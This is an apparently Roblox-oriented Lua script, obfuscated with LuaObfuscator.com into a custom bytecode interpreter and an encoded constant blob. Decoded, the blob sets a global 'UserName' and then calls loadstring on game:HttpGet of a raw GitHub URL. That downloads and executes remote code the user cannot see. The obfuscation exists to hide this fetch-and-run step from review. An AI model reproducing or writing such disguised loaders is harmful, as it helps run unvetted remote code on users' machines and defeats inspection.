--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then v16=function(v21,v22,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==0) then v28=1;v29=nil;v21=v5(v4(v21,5),"..",function(v40)if (v2(v40,2)==79) then v29=v1(v4(v40,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v3(v1(v40,16));if v29 then local v115=v6(v84,v29);v29=nil;return v115;else return v84;end break;end end end end);v30=nil;v27=1;end if (v27==5) then v39=nil;v39=function(v41,v42,v43)local v48=v41[1];local v49=v41[2];local v50=v41[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1 ;local function v80()local v85=v48;local v86=v49;local v87=v50;local v88=v37;local v89={};local v90={};local v91={};for v98=903 -(494 + 409) ,v79 do if ((v98>=v87) or ((16757 -13321)<(1451 -(28 + 145)))) then v89[v98-v87 ]=v78[v98 + (585 -(48 + 536)) ];else v91[v98]=v78[v98 + ((4 -2) -1) ];end end local v92=(v79-v87) + 1 ;local v93;local v94;while true do local v99=0 -0 ;local v100;local v101;while true do if ((((5629 -(22 + 275)) -3351)<=((6755 -(484 + 1066)) -(87 + 144 + 229))) and (v99==(1507 -(425 + 1059 + (1634 -(199 + 1413)))))) then while true do if ((v100==(583 -(288 + 295))) or ((3081 -1370)==(20341 -15362))) then v101=247 -(25 + 222) ;while true do if (((2839 -(858 + 66))==1915) and ((0 -0)==v101)) then local v119=(1801 -(1255 + 546)) + 0 ;while true do if ((v119==1) or ((5490 -3125)==(847 -395))) then v101=886 -(187 + 698) ;break;end if ((v119==(1973 -(228 + 382 + 1363))) or ((6546 -3352)<(3981 -(137 + 110 + 827)))) then local v121=0 -(1176 -(387 + 789)) ;while true do if (((7605 -4609)>203) and (v121==1)) then v119=(3 + 1) -(10 -7) ;break;end if (((5938 -(177 + 1213))>4452) and (v121==(0 + 0))) then v93=v85[v76];v94=v93[1204 -(949 + 254) ];v121=1;end end end end end if ((v101==(2 -1)) or (4906==3838)) then if (((1380 -(9 + 1314))>=(138 -(41 + 48))) and (v94<=(1 + 4))) then if ((v94<=(9 -(1 + 6))) or ((9257 -6120)<=(527 + 508))) then if (((729 -(78 + 98))<(11423 -7229)) and (v94<=(0 + 0))) then local v128=0 -0 ;local v129;local v130;while true do if ((v128==(0 + (956 -(57 + 899)))) or ((5021 -(345 + 1231))>=(3368 + 1052))) then v129=0 -(0 + 0) ;v130=nil;v128=939 -(222 + 716) ;end if (((1663 + 894)>(1957 -(656 + 628))) and (v128==(1 -0))) then while true do if ((v129==(0 + 0)) or ((344 + 187 + 168)>(2460 -(385 + 44)))) then v130=v93[1 + 1 ];v91[v130]=v91[v130](v14(v91,v130 + (1885 -(1320 + 564)) + 0 ,v77));break;end end break;end end elseif ((v94==(1 -0)) or ((4937 -(16 + 718 + 355))<=(13 + 475))) then for v155=v93[2],v93[1 + 2 + 0 ] do v91[v155]=nil;end else v91[v93[2]]=v43[v93[3]];end elseif (((43 + 2 + 1106)<=1808) and (v94<=3)) then v91[v93[5 -(36 -(26 + 7)) ]]=v93[9 -(3 + 3) ]~=(0 -0) ;elseif (((2212 -(1735 + 10 + 9))==(899 -441)) and (v94==(2 + 2))) then local v139=0;local v140;local v141;local v142;local v143;while true do if (((1984 + 540)>=1132) and (v139==((4698 -3515) -(181 + 770 + 231)))) then v142=nil;v143=nil;v139=(73 + 29) -(90 + 10) ;end if ((v139==(3 -(1 + 0))) or (570>=(1081 + 3483))) then while true do if (((2100 -(230 + 589))<(23776 -18822)) and ((0 + 0 + 0)==v140)) then v141=0;v142=nil;v140=4 -3 ;end if ((v140==(828 -(806 + 21))) or ((4570 -(1043 + 689))==(74 + 129 + 3656))) then v143=nil;while true do if (((1330 + 936)<(1371 + (8369 -5113))) and (v141==(1545 -(67 + 1477)))) then v91[v142 + (207 -(100 + 106)) + 0 ]=v143;v91[v142]=v143[v93[15 -11 ]];break;end if (((4077 + (947 -(24 + 27)))>((1021 -590) + 286)) and (v141==(0 + 0))) then local v187=1323 -(661 + 662) ;local v188;while true do if (((13255 -9770)>(4254 -(302 + 70 + (2837 -(617 + 774))))) and (v187==(1073 -(832 + 224 + 17)))) then v188=0 -0 ;while true do if ((v188==(0 -0)) or (((4695 -(283 + 337)) -2072)>=(341 + 2285))) then local v198=0 + 0 ;while true do if ((v198==1) or ((3530 -(1335 + 1197))>=(4835 -(181 + 111)))) then v188=2 -1 ;break;end if ((((7988 -3985) + 310)>(880 + 1138)) and (v198==(0 + 0))) then v142=v93[7 -5 ];v143=v91[v93[1950 -((2502 -1432) + 107 + 770) ]];v198=(292 -(170 + 119)) -(1 + 1) ;end end end if ((v188==((3 -2) + 0)) or (2167==1422)) then v141=(7 -5) -1 ;break;end end break;end end end end break;end end break;end if (((2639 + 131)>=(149 + 28)) and (v139==(1514 -(1399 + 115)))) then v140=927 -(759 + 168) ;v141=nil;v139=2 -1 ;end end else v91[v93[2]]();end elseif ((v94<=(1892 -(1679 + (1022 -(11 + 806))))) or (((981 + 952) -(528 + 67))<=(640 + 137))) then if ((((3723 + 343) -(868 + 444 + 103))>(690 + 1702)) and (v94<=6)) then v76=v93[44 -(31 + 10) ];elseif ((v94==(1707 -(468 + 1232))) or ((5449 -(15152 -11827))>=4152)) then v91[v93[(2952 -1687) -(551 + 712) ]]=v93[1722 -(897 + 543 + 279) ];else local v146=0 -0 ;local v147;local v148;local v149;local v150;local v151;while true do if ((v146==1) or ((431 + 3487)>(5231 -(705 + 6)))) then v149=nil;v150=nil;v146=(1 + 5) -4 ;end if (((4599 -(374 + 42))>(3854 -1935)) and (((7393 -5606) -(455 + 53 + 1279))==v146)) then v147=0 + 0 ;v148=nil;v146=1503 -(1356 + 146) ;end if (((159 + 1782)<=(986 + (16180 -12802))) and ((27 -((793 -(334 + 447)) + 13))==v146)) then v151=nil;while true do if ((3578<=(5758 -(654 + 546))) and (v147==(1 -0))) then local v177=(437 + 537) -(780 + 194) ;while true do if ((3509>=(457 + 71)) and (((5 -3) -1)==v177)) then v147=4 -2 ;break;end if ((v177==(0 + 0)) or ((4850 -2202)>(2292 + 33 + 1202))) then v77=(v150 + v148) -((55 -(38 + 16)) -(0 + 0)) ;v151=0 + 0 ;v177=1;end end end if (((2 + (0 -0))==v147) or (3106==((414 + 8691) -(8888 -3796)))) then for v179=v148,v77 do local v180=0;local v181;local v182;while true do if ((3778==(2128 + 1650)) and (v180==(1533 -(1530 + 2)))) then while true do if (((0 -(430 -(92 + 338)))==v181) or ((1738 -956)<(197 + 189))) then v182=0 + 0 ;while true do if ((((0 + 0) -0)==v182) or ((1753 + 112 + 1205)<=(4158 -(1506 + 92)))) then v151=v151 + (1 -0) + 0 ;v91[v179]=v149[v151];break;end end break;end end break;end if (((3279 -(324 + (2182 -(947 + 321))))>=(1640 + 361)) and ((796 -(315 + 481))==v180)) then v181=(608 + 192) -(762 + (356 -(9 + 309))) ;v182=nil;v180=3 -2 ;end end end break;end if ((v147==(1649 -(1562 + (1715 -(736 + 892))))) or ((5035 -(63 + 1194))<=(2634 -(1074 + 321 + 292)))) then local v178=0 + 0 ;while true do if ((v178==0) or (((6531 + 6) -(256 + 2250))>(19715 -14746))) then v148=v93[1752 -(415 + 1335) ];v149,v150=v88(v91[v148](v14(v91,v148 + 1 + 0 ,v93[1651 -(336 + 1312) ])));v178=1 + 0 ;end if (((1762 -(110 + 541))>=(558 + 36 + 179)) and (v178==1)) then v147=4 -3 ;break;end end end end break;end end end elseif (((2541 + 993)==(6157 -2623)) and (v94<=9)) then if ((v91[v93[2]]==v93[2 + 0 + 2 ]) or ((10193 -5593)<=(2132 + 1078))) then v76=v76 + 1 ;else v76=v93[3 -0 ];end elseif ((v94>(528 -(454 + 64))) or ((139 -98)>=747)) then do return;end else v43[v93[(2691 -967) -(1202 + 519) ]]=v91[v93[1 + 1 ]];end v76=v76 + (3 -2) ;break;end end break;end end break;end if (((0 -0)==v99) or (3283>(11223 -(19952 -12061)))) then v100=0 + 0 ;v101=nil;v99=1 + (1392 -(335 + 1057)) ;end end end end A,B=v37(v12(v80));if  not A[1] then local v102=v41[4][v76] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end;return v39(v38(),{},v22)(...);end if (v27==2) then v32=function()local v51,v52=v2(v21,v28,v28 + (1410 -(68 + 1340)) );v28=v28 + (248 -(34 + 212)) ;return (v52 * (220 + 36)) + v51 ;end;v33=nil;v33=function()local v53,v54,v55,v56=v2(v21,v28,v28 + (869 -(703 + 163)) );v28=v28 + 4 ;return (v56 * (14655034 + 2122182)) + (v55 * ((155113 -107841) + 1327 + 16937)) + (v54 * (783 -(119 + 408))) + v53 ;end;v34=nil;v27=3;end if (v27==1) then v30=function(v44,v45,v46)if v46 then local v95=0;local v96;while true do if (v95==0) then v96=(v44/((1 + 1)^(v45-(2 -1))))%((7 -5)^(((v46-(1 + 0)) -(v45-(1 + 0))) + (4 -3))) ;return v96-(v96%(527 -(447 + 79))) ;end end else local v97=(1 + 1)^(v45-(1 + 0)) ;return (((v44%(v97 + v97))>=v97) and ((1747 + 47) -(175 + 1618))) or 0 ;end end;v31=nil;v31=function()local v57=0 -0 ;local v58;while true do if (v57==(0 -0)) then v58=v2(v21,v28,v28);v28=v28 + 1 + 0 ;v57=(95 -(20 + 74)) + (862 -(353 + 509)) ;end if (v57==(252 -(72 + (1763 -(458 + 1126))))) then return v58;end end end;v32=nil;v27=2;end if (v27==3) then v34=function()local v59=0;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==0) then v60=v33();v61=v33();v59=(1210 -(656 + 553)) + 0 ;end if (v59==(52 -(6 + 19 + 24))) then if (v64==(0 -(0 + 0))) then if (v63==(1360 -(679 + 681))) then return v65 * (0 -0) ;else local v116=0;while true do if (v116==(0 + 0)) then v64=1;v62=0 + (0 -0) ;break;end end end elseif (v64==(2780 -(654 + (194 -115)))) then return ((v63==(882 -(547 + 335))) and (v65 * (1/0))) or (v65 * NaN) ;end return v9(v65,v64-((1405 -866) + 484) ) * (v62 + (v63/((243 -(89 + 152))^(1319 -(938 + (1099 -(277 + 493))))))) ;end if (v59==(1 + 1 + 0)) then v64=v30(v61,2008 -(905 + 1082) ,774 -(256 + (1121 -634)) );v65=((v30(v61,898 -(160 + 706) )==1) and  -(2 -1)) or (1 + 0) ;v59=10 -7 ;end if (v59==1) then v62=105 -(95 + 9) ;v63=(v30(v61,1 -0 ,20) * (((27 -20) -5)^((120 -53) -(99 -64)))) + v60 ;v59=797 -(70 + 725) ;end end end;v35=nil;v35=function(v47)local v66;if  not v47 then v47=v33();if (v47==(0 + 0)) then return "";end end v66=v4(v21,v28,(v28 + v47) -(1 + 0) );v28=v28 + v47 ;local v67={};for v81=1412 -(1167 + 244) , #v66 do v67[v81]=v3(v2(v4(v66,v81,v81)));end return v7(v67);end;v36=v33;v27=4;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v68=0 + 0 ;local v69;local v70;local v71;local v72;local v73;local v74;local v75;while true do if (v68==3) then v75=nil;while true do local v108=0;local v109;local v110;while true do if (v108==(0 -0)) then v109=0 -0 ;v110=nil;v108=1335 -(1077 + 257) ;end if (v108~=(1 + 0)) then else while true do if (v109~=(0 -0)) then else v110=0 + 0 ;while true do if (v110==(1883 -(794 + 1088))) then if (v69~=0) then else local v122=0;local v123;while true do if (v122~=0) then else v123=0;while true do if (v123~=1) then else v72={};v69=1 + 0 ;break;end if (v123==(0 -0)) then local v157=971 -(606 + 365) ;while true do if (v157==(0 + 0)) then v70={};v71={};v157=2 -1 ;end if (v157==(1855 -(689 + 1165))) then v123=1176 -(786 + 389) ;break;end end end end break;end end end if (v69==3) then local v124=0;local v125;while true do if ((0 -0)~=v124) then else v125=0 + 0 ;while true do local v136=1856 -(1374 + 482) ;while true do if (v136==0) then if (v125==(0 -0)) then for v173=1 + 0 ,v33() do v71[v173-1 ]=v38();end for v175=1 + 0 ,v33() do v72[v175]=v33();end v125=2 -1 ;end if (v125==1) then return v73;end break;end end end break;end end end break;end if (v110==(1689 -(1551 + 138))) then local v120=0 -0 ;while true do if (v120==(588 -(389 + 199))) then if (2~=v69) then else local v133=889 -(262 + 627) ;while true do if (v133~=0) then else for v159=883 -(817 + 65) ,v74 do local v160=1262 -(864 + 398) ;local v161;local v162;local v163;local v164;while true do if (v160~=(478 -(258 + 218))) then else while true do if (v161~=(423 -(137 + 286))) then else v162=0;v163=nil;v161=1;end if (v161==(2 -1)) then v164=nil;while true do if (v162~=(1 + 0)) then else if (v163==1) then v164=v31()~=0 ;elseif (v163==(1 + 1)) then v164=v34();elseif (v163~=(301 -(214 + 84))) then else v164=v35();end v75[v159]=v164;break;end if (v162==(1324 -(1058 + 266))) then local v191=0;local v192;while true do if (v191==(1978 -(1129 + 849))) then v192=0 + 0 ;while true do if (v192==(664 -(61 + 603))) then local v201=0 + 0 ;while true do if (0~=v201) then else local v206=1401 -(801 + 600) ;while true do if (v206==0) then v163=v31();v164=nil;v206=1;end if (v206~=1) then else v201=1;break;end end end if (v201==1) then v192=1;break;end end end if (v192==(1 -0)) then v162=1;break;end end break;end end end end break;end end break;end if (v160==(1265 -(710 + 554))) then v163=nil;v164=nil;v160=8 -6 ;end if (v160==0) then v161=0 + 0 ;v162=nil;v160=1;end end end v73[3 + 0 ]=v31();v133=1;end if (v133==(3 -2)) then for v165=2 -1 ,v33() do local v166=0;local v167;local v168;local v169;while true do if (v166==0) then v167=0 -0 ;v168=nil;v166=365 -(130 + 234) ;end if (v166==(1 + 0)) then v169=nil;while true do if ((1 -0)==v167) then while true do if (v168~=(1633 -(1537 + 96))) then else v169=v31();if (v30(v169,1842 -(451 + 1390) ,1)==0) then local v193=0 -0 ;local v194;local v195;local v196;local v197;while true do if (v193==(3 -1)) then while true do if ((2 + 1)==v194) then if (v30(v196,3,3)==(1 -0)) then v197[4]=v75[v197[3 + 1 ]];end v70[v165]=v197;break;end if (v194==(1348 -(859 + 488))) then v197={v32(),v32(),nil,nil};if (v195==(0 + 0)) then local v209=0 -0 ;local v210;local v211;while true do if (v209~=(133 -(121 + 12))) then else local v217=0;while true do if (v217==0) then v210=502 -(462 + 40) ;v211=nil;v217=1;end if (v217==1) then v209=1 + 0 ;break;end end end if (1==v209) then while true do if (v210~=0) then else v211=1893 -(1186 + 707) ;while true do if (v211~=0) then else v197[3]=v32();v197[1 + 3 ]=v32();break;end end break;end end break;end end elseif (v195==1) then v197[3]=v33();elseif (v195==(859 -(443 + 414))) then v197[3]=v33() -(2^(29 -13)) ;elseif (v195==3) then local v219=0;local v220;while true do if (v219==(0 -0)) then v220=0 + 0 ;while true do if (v220~=(0 + 0)) then else v197[3]=v33() -(2^(16 + 0)) ;v197[4]=v32();break;end end break;end end end v194=2;end if (v194~=(2 + 0)) then else if (v30(v196,1,2 -1 )==1) then v197[5 -3 ]=v75[v197[2]];end if (v30(v196,1562 -(1103 + 457) ,2)==1) then v197[11 -8 ]=v75[v197[3]];end v194=3;end if (v194==0) then local v205=0;while true do if (v205==1) then v194=3 -2 ;break;end if (v205==0) then v195=v30(v169,2,3);v196=v30(v169,3 + 1 ,3 + 3 );v205=1;end end end end break;end if (v193==(0 + 0)) then v194=643 -(386 + 257) ;v195=nil;v193=1;end if (v193~=(1 + 0)) then else v196=nil;v197=nil;v193=2;end end end break;end end break;end if (v167~=0) then else local v183=0;while true do if (v183==0) then v168=0;v169=nil;v183=1;end if ((1770 -(1093 + 676))~=v183) then else v167=1 -0 ;break;end end end end break;end end end v69=3;break;end end end if (v69==1) then local v134=1381 -(1345 + 36) ;local v135;while true do if ((1783 -(752 + 1031))~=v134) then else v135=0;while true do if (v135==(3 -2)) then v75={};v69=1467 -(1126 + 339) ;break;end if (v135==0) then local v172=0 -0 ;while true do if (0==v172) then v73={v70,v71,nil,v72};v74=v33();v172=1;end if (v172~=1) then else v135=1;break;end end end end break;end end end v120=1;end if (v120==1) then v110=1;break;end end end end break;end end break;end end end break;end if (v68==1) then local v103=0;while true do if ((1 + 0)==v103) then v68=7 -5 ;break;end if ((0 + 0)==v103) then v71=nil;v72=nil;v103=489 -(424 + 64) ;end end end if ((1756 -(498 + 1258))==v68) then local v104=0;local v105;while true do if (v104==0) then v105=892 -(19 + 873) ;while true do if ((0 + 0)==v105) then local v117=88 -(79 + 9) ;while true do if (v117~=(1 + 0)) then else v105=1;break;end if (v117~=0) then else v69=0;v70=nil;v117=1;end end end if (v105~=(3 -2)) then else v68=1;break;end end break;end end end if (v68==(3 -1)) then local v106=0 -0 ;local v107;while true do if (v106~=0) then else v107=0;while true do if (v107==0) then local v118=0 -0 ;while true do if (v118==(1 + 0)) then v107=1;break;end if (v118==0) then v73=nil;v74=nil;v118=1340 -(1260 + 79) ;end end end if (v107~=1) then else v68=3 -0 ;break;end end break;end end end end end;v27=5;end end end;v16("LOL!073O00028O0003083O00557365724E616D6503023O007649030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E00163O0012073O00014O0001000100013O0026093O0002000100010004063O00020001001207000100013O00260900010005000100010004063O00050001001207000200033O00120A000200023O001202000200043O001202000300053O002004000300030006001207000500074O0003000600014O0008000300066O00023O00022O00050002000100010004063O001500010004063O000500010004063O001500010004063O000200012O000B3O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end end end
